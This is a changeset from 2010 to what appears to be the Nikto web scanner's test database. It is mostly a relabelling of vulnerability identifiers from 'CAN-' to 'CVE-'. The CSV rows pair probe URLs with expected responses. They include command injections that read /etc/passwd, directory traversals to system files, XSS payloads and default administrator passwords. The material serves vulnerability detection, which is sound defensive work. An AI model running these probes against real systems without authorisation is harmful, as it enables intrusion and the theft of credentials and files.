Changeset 332
- Timestamp:
- 02/26/2010 03:07:49 PM (3 years ago)
- File:
-
- 1 edited
-
trunk/plugins/db_tests (modified) (15 diffs)
Legend:
- Unmodified
- Added
- Removed
-
trunk/plugins/db_tests
r331 r332 1211 1211 "001189","3092","23","/_vti_pvt/doctodep.btr","GET","200","","","","","FrontPage file found. This may contain useful information.","","" 1212 1212 "001190","3092","23","/_vti_pvt/services.org","GET","200","","","","","FrontPage file found. This may contain useful information.","","" 1213 "001191"," 3092","3","/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","FrontPage Error","","Gives info about server settings. CAN-2000-0413, CAN-2000-0709, CAN-2000-0710, BID-1608, BID-1174.","",""1214 "001192"," 3092","3","/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","Unknown CONTENT_TYPE","","Gives info about server settings.","",""1213 "001191","28260","3","/_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","FrontPage Error","","Gives info about server settings. CVE-2000-0413, CVE-2000-0709, CVE-2000-0710, BID-1608, BID-1174.","","" 1214 "001192","28260","3","/_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611","POST","200","","","Unknown CONTENT_TYPE","","Gives info about server settings.","","" 1215 1215 "001193","3092","a","/_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","","" 1216 1216 "001194","3092","a","/_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals","POST","200","","","specified module could not be found","","We seem to have authoring access to the FrontPage web.","","" … … 1465 1465 "001448","2117","b","/","GET","samba is configured to deny","","","","","Samba-swat web server. Used to administer Samba.","","" 1466 1466 "001449","2117","b","/cpanel/","GET","200","","","","","Web-based control panel","","" 1467 "001450","2119","9","/shopexd.asp?catalogid='42","GET","catalogid='42'","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. C AN-2003-0560, BID-8159","",""1468 "001451","2119","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. C AN-2003-0560, BID-8159","",""1469 "001452","2234","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. C AN-1999-1376. BID-2252.","",""1467 "001450","2119","9","/shopexd.asp?catalogid='42","GET","catalogid='42'","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","","" 1468 "001451","2119","9","/shopping/diag_dbtest.asp","GET","200","","","","","VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159","","" 1469 "001452","2234","3","/_vti_bin/fpcount.exe/","GET","Empty output from CGI program","","","","","The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. CVE-1999-1376. BID-2252.","","" 1470 1470 "001453","2390","4","/forum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","","" 1471 1471 "001454","2390","4","/zorum/index.php?method=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Zorum v3.4 and below are vulnerable to XSS attacks.","","" … … 1507 1507 "001490","2813","4","/admin/database/wwForum.mdb","GET","200","","","","","Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein","","" 1508 1508 "001491","2830","5","/../config.dat","GET","EnablePasswords","","","","","Directory traversal and config.dat suggests NetServe web server and default admin folder. This file contains the administrative login/pass.","","" 1509 "001492","284","3","/iisadmpwd/aexp2.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. C AN-1999-0407. BID-4236. BID-2110.","",""1510 "001493","284","3","/iisadmpwd/aexp2b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. C AN-1999-0407. BID-4236. BID-2110.","",""1511 "001494","284","3","/iisadmpwd/aexp3.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. C AN-1999-0407. BID-4236. BID-2110.","",""1512 "001495","284","3","/iisadmpwd/aexp4.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. C AN-1999-0407. BID-4236. BID-2110.","",""1513 "001496","284","3","/iisadmpwd/aexp4b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. C AN-1999-0407. BID-4236. BID-2110.","",""1509 "001492","284","3","/iisadmpwd/aexp2.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" 1510 "001493","284","3","/iisadmpwd/aexp2b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" 1511 "001494","284","3","/iisadmpwd/aexp3.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" 1512 "001495","284","3","/iisadmpwd/aexp4.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" 1513 "001496","284","3","/iisadmpwd/aexp4b.htr","GET","200","","","value=\"\"","","Gives domain and system name, may allow an attacker to brute force for access. Also will allow an NT4 user to change his password regardless of the 'user cannot change password' security policy. CVE-1999-0407. BID-4236. BID-2110.","","" 1514 1514 "001497","2842","a","//admin/aindex.htm","GET","200","","","","","FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt","","" 1515 1515 "001498","2873","a","@CGIDIRSgbadmin.cgi?action=change_adminpass","GET","200","","","","","RNN Guestbook 1.2 contains multiple vulnerabilities including remotely changing administrative password, deleting posts, changing the setup, remotely executing commands, and more. By default, the admin password is either 'admin' or 'demo'. See Nov 26, 200","","" … … 2980 2980 "002974","3233","2","/index.html.var","GET","200","","","","","Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.","","" 2981 2981 "002975","3233","2","/test","GET","test hierarchy","","","","","Apache Tomcat default file found. All default files should be removed.","","" 2982 "002976","3233","2","/iissamples/issamples/codebrws.asp","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be removed. C AN-1999-0739. MS99-013.","",""2982 "002976","3233","2","/iissamples/issamples/codebrws.asp","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be removed. CVE-1999-0739. MS99-013.","","" 2983 2983 "002977","3233","2","/iissamples/issamples/ixqlang.htm","GET","Query Language","","","","","IIS default file found. All default files should be removed.","","" 2984 "002978","3233","2","/iissamples/issamples/Winmsdp.exe","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be removed. C AN-1999-0738. MS99-013.","",""2985 "002979","3233","2","/iissamples/sdk/asp/docs/codebrw2.asp","GET","200","","","","","This is a default IIS script/file which should be removed. C AN-1999-0739. MS99-013.","",""2986 "002980","3233","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file which should be removed. C AN-1999-0739. MS99-013.","",""2987 "002981","3233","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file which should be removed. C AN-1999-0738. MS99-013.","",""2984 "002978","3233","2","/iissamples/issamples/Winmsdp.exe","GET","Sample ASP Search Form","","","","","This is a default IIS script/file which should be removed. CVE-1999-0738. MS99-013.","","" 2985 "002979","3233","2","/iissamples/sdk/asp/docs/codebrw2.asp","GET","200","","","","","This is a default IIS script/file which should be removed. CVE-1999-0739. MS99-013.","","" 2986 "002980","3233","2","/iissamples/sdk/asp/docs/codebrws.asp","GET","200","","","","","This is a default IIS script/file which should be removed. CVE-1999-0739. MS99-013.","","" 2987 "002981","3233","2","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","200","","","","","This is a default IIS script/file which should be removed. CVE-1999-0738. MS99-013.","","" 2988 2988 "002982","3233","2","/mc-icons/","GET","Index of","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","","" 2989 2989 "002983","3233","2","/ns-icons/","GET","Index of","","","","","Default Netscape/iPlanet ns-icons and mc-icons are present. Edit the obj.conf and remove them. All default files should be removed.","","" … … 3023 3023 "003017","3281","4","/search.asp?Search=\"><script>alert(Vulnerable)</script>","GET","><script>alert()</script>","","","","","Max Web Portal is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3024 3024 "003018","3282","8","/uploader.php","GET","200","","","","","This script may allow arbitrary files to be uploaded to the remote server.","","" 3025 "003019","3284","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not. C AN-1999-0738. MS99-013.","",""3026 "003020","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. C AN-1999-0738. MS99-013.","",""3027 "003021","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. C AN-1999-0738. MS99-013.","",""3025 "003019","3284","3","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp","GET","Path not found","","","","","Winmsdp.exe can be used to determine if a file system path exists or not. CVE-1999-0738. MS99-013.","","" 3026 "003020","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe","GET","View Active Server Page Source","","","","","IIS 5 comes with an ASP that allows remote code to viewed. All default files in /IISSamples should be removed. CVE-1999-0738. MS99-013.","","" 3027 "003021","3284","5","/iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp","GET","200","","","","","IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. CVE-1999-0738. MS99-013.","","" 3028 3028 "003022","3284","6","/iissamples/exair/howitworks/Winmsdp.exe","GET","ASP Source code browser","","","","","This is a default IIS script/file which should be removed, it may allow a DoS against the server. CVE-1999-1451, XF-2371, MS99-013 and MSKB-Q231368","","" 3029 3029 "003023","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[fonts]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","","" 3030 3030 "003024","3285","7","/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini","GET","[windows]","","","","","Abyss allows directory traversal if %5c is in a URL. Upgrade to the latest version.","","" 3031 "003025","3286","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. C AN-2002-1081","",""3032 "003026","3286","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. C AN-2002-1081","",""3033 "003027","3286","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. C AN-2002-1081","",""3034 "003028","3286","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. C AN-2002-1081","",""3031 "003025","3286","5","/conspass.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3032 "003026","3286","5","/consport.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3033 "003027","3286","5","/general.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3034 "003028","3286","5","/srvstatus.chl+","GET","200","","","","","Abyss allows hidden/protected files to be served if a + is added to the request. CVE-2002-1081","","" 3035 3035 "003029","3288","3","///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////","GET","index of","","","","","Abyss 1.03 reveals directory listing when /'s are requested.","","" 3036 3036 "003030","3289","4","/firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz","GET","<script>alert('Vulnerable')</script>","","","","","Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.","","" … … 3072 3072 "003068","3399","d","/cfide/administrator/index.cfm","GET","PasswordProvided","","","","","Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538, ALLAIRE:ASB00-14, BID-1314.","","" 3073 3073 "003069","3399","d","/CFIDE/administrator/index.cfm","GET","PasswordProvided","","","","","ColdFusion Administrator for Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users. CVE-2000-0538. ALLAIRE:ASB00-14. BID-1314.","","" 3074 "003070","3407","7","/directory.php?dir=%3Bcat%20/etc/passwd","GET","root:","","","","","Marcus S. Xenakis directory.php script allows for command execution. C AN-2002-0434.","",""3074 "003070","3407","7","/directory.php?dir=%3Bcat%20/etc/passwd","GET","root:","","","","","Marcus S. Xenakis directory.php script allows for command execution. CVE-2002-0434.","","" 3075 3075 "003071","3410","7","/content/base/build/explorer/none.php?..:..:..:..:..:..:..:etc:passwd:","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","","" 3076 3076 "003072","3410","7","/content/base/build/explorer/none.php?/etc/passwd","GET","root:","","","","","SunPS iRunbook Version 2.5.2 allows files to be read remotely.","","" 3077 3077 "003073","3411","3","/soapConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugrtraq #4290.","","" 3078 "003074","3412","7","@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. C AN-2001-0320","",""3079 "003075","3412","7","@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. C AN-2001-0320","",""3078 "003074","3412","7","@CGIDIRSbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","","" 3079 "003075","3412","7","@NUKEbbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHPNuke is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CVE-2001-0320","","" 3080 3080 "003076","3414","3","@CGIDIRSGW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA","GET","SYS:","","","","","Some Netware web servers reveal the system path to files when unexpected arguments are sent to CGI.","","" 3081 3081 "003077","3416","7","/GW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" 3082 "003078","3416","7","/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system. C AN-2002-0341.","",""3082 "003078","3416","7","/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system. CVE-2002-0341.","","" 3083 3083 "003079","3416","7","@CGIDIRSGW5/GWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" 3084 3084 "003080","3416","7","@CGIDIRSGWWEB.EXE?HELP=bad-request","GET","Could not find file SYS","","","","","Groupwise allows system information and file retrieval by modifying arguments to the help system.","","" 3085 "003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. C AN-2003-0624. CA-2000-02.","",""3085 "003081","3417","4","/examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CVE-2003-0624. CA-2000-02.","","" 3086 3086 "003082","3423","3","/XSQLConfig.xml","GET","200","","","","","Oracle 9iAS configuration file found - see bugrtraq #4290.","","" 3087 "003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). C AN-2002-0375. CA-2000-02.","",""3088 "003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). C AN-2003-0801.","",""3089 "003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. C AN-2003-0802.","",""3090 "003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ C AN-2001-1212, CA-2000-02.","",""3091 "003087","3487","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible (CAN-2001-1233)","",""3092 "003088","3489","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available. C AN-2002-0705.","",""3093 "003089","3500","8","/_vti_bin/fpcount.exe","GET","specified CGI application misbehaved","","","","","Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. C AN-1999-1376. BID-2252.","",""3094 "003090","3501","3","/_private/form_results.htm","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. C AN-1999-1052.","",""3095 "003091","3501","3","/_private/form_results.html","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. C AN-1999-1052.","",""3096 "003092","3501","3","/_private/form_results.txt","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. C AN-1999-1052.","",""3087 "003083","3458","4","/sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CVE-2002-0375. CA-2000-02.","","" 3088 "003084","3483","3","/docs/<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CVE-2003-0801.","","" 3089 "003085","3484","3","/docs/NED?action=retrieve&location=.","GET","docs\ned","","","","","Nokia Electronic Documentation allows directory listings and reveals its installation path. CVE-2003-0802.","","" 3090 "003086","3486","4","/aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script>","GET","<script>alert('Vulnerable')</script>","","","","","Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CVE-2001-1212, CA-2000-02.","","" 3091 "003087","3487","d","/lcgi/ndsobj.nlm","GET","SCRIPT_NAME","","","","","Novell Netware 5.1 contains a buffer overflow, also, if Groupwise is enabled remote enumeration of users, groups and system information might be possible.CVE-2001-1233","","" 3092 "003088","3489","3","/surf/scwebusers","GET","200","","","","","SurfControl SuperScout Web Reports Server user and password file is available. CVE-2002-0705.","","" 3093 "003089","3500","8","/_vti_bin/fpcount.exe","GET","specified CGI application misbehaved","","","","","Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. CVE-1999-1376. BID-2252.","","" 3094 "003090","3501","3","/_private/form_results.htm","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","","" 3095 "003091","3501","3","/_private/form_results.html","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","","" 3096 "003092","3501","3","/_private/form_results.txt","GET","200","","","cannot be displayed","","This file may contain information submitted by other web users via forms. CVE-1999-1052.","","" 3097 3097 "003093","3512","7","/scripts/tools/getdrvrs.exe","GET","200","","","","","MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).","","" 3098 3098 "003094","3513","7","@CGIDIRSwebbbs/webbbs_config.pl?name=joe&email=test@example.com&body=aaaaffff&followup=10;cat%20/etc/passwd","GET","root:","","","","","WebBBS by Darryl Burgdorf is vulnerable to command execution.","","" 3099 3099 "003095","3514","7","@CGIDIRSvote.cgi","GET","200","","","","","Mike's Vote CGI contained a bug which allowed arbitrary command execution (version 1.2), see http://freshmeat.net/projects/mikessurveycgi/","","" 3100 3100 "003096","3515","7","@CGIDIRSquizme.cgi","GET","200","","","","","Mike's Quiz Me! CGI contained a bug which allowed arbitrary command execution (version 0.5), see http://freshmeat.net/users/mikespice/","","" 3101 "003097","3565","3","//","OPTIONS","not found for:","","","","","By sending an OPTIONS request for /, the physical path to PHP can be revealed. C AN-2002-0240, BID-8119, BID-4057, http://archives.neohapsis.com/archives/bugtraq/2002-02/0043.html.","",""3102 "003098","3566","7","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. C AN-2003-0243.","",""3103 "003099","3566","7","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. C AN-2003-0243.","",""3104 "003100","3566","7","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. C AN-2003-0243.","",""3105 "003101","3567","7","/shop/member_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. C AN-2003-0243.","",""3106 "003102","3567","7","/shop/member_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. C AN-2003-0243.","",""3107 "003103","3568","7","@CGIDIRSsendform.cgi","GET","200","","","","","This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. C AN-2002-0710. BID-5286.","",""3101 "003097","3565","3","//","OPTIONS","not found for:","","","","","By sending an OPTIONS request for /, the physical path to PHP can be revealed. CVE-2002-0240, BID-8119, BID-4057, http://archives.neohapsis.com/archives/bugtraq/2002-02/0043.html.","","" 3102 "003098","3566","7","/shop/normal_html.cgi?file=../../../../../../etc/issue%00","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary files to be retrieved remotely. CVE-2003-0243.","","" 3103 "003099","3566","7","/shop/normal_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","","" 3104 "003100","3566","7","/shop/normal_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","","" 3105 "003101","3567","7","/shop/member_html.cgi?file=;cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","","" 3106 "003102","3567","7","/shop/member_html.cgi?file=|cat%20/etc/passwd|","GET","root:","","","","","Happymail E-Commerce 4.3/4.4 allows arbitrary commands to be executed remotely. CVE-2003-0243.","","" 3107 "003103","3568","7","@CGIDIRSsendform.cgi","GET","200","","","","","This CGI by Rod Clark (v1.4.4 and below) may allow arbitrary file reading via email or allow spam to be sent. CVE-2002-0710. BID-5286.","","" 3108 3108 "003104","3569","7","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","GET","boot loader","","","","","Citrix CGI allows directory traversal.","","" 3109 3109 "003105","3570","2","/proxy/ssllogin?user=administrator&password=administrator","GET",">administrator<","","","","","Compaq Web-Based Management allows login with id/pass 'administrator'/'administrator'.","","" … … 3128 3128 "003124","3762","4","/debug/errorInfo?title===<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.","","" 3129 3129 "003125","3762","4","/debug/showproc?proc===<script>alert('Vulnerable');</script>","GET","<script>alert('Vulnerable');</script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","","" 3130 "003126","379","8","/site/eg/source.asp","GET","200","","","","","This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. C AN-2000-0628.","",""3130 "003126","379","8","/site/eg/source.asp","GET","200","","","","","This asp (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. CVE-2000-0628.","","" 3131 3131 "003127","3800","7","@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","phpMyAdmin is vulnerable to a directory traversal attack.","","" 3132 3132 "003128","383","2","/~nobody/etc/passwd","GET","root:","","","","","Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.","","" … … 3204 3204 "003200","4360","2","/acart2_0/acart2_0.mdb","GET","200","","","","","Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.","","" 3205 3205 "003201","4361","2","/acart2_0/admin/category.asp","GET","200","","","","","Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.","","" 3206 "003202","474","7","/Sites/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3207 "003203","474","7","/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3208 "003204","474","7","/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3209 "003205","474","7","/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3210 "003206","474","7","/Sites/Samples/Knowledge/Push/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3211 "003207","474","7","/Sites/Samples/Knowledge/Search/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3212 "003208","474","7","/SiteServer/Publishing/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. C AN-1999-0737. MS99-013.","",""3206 "003202","474","7","/Sites/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3207 "003203","474","7","/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3208 "003204","474","7","/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine. CVE-1999-0737. MS99-013.","","" 3209 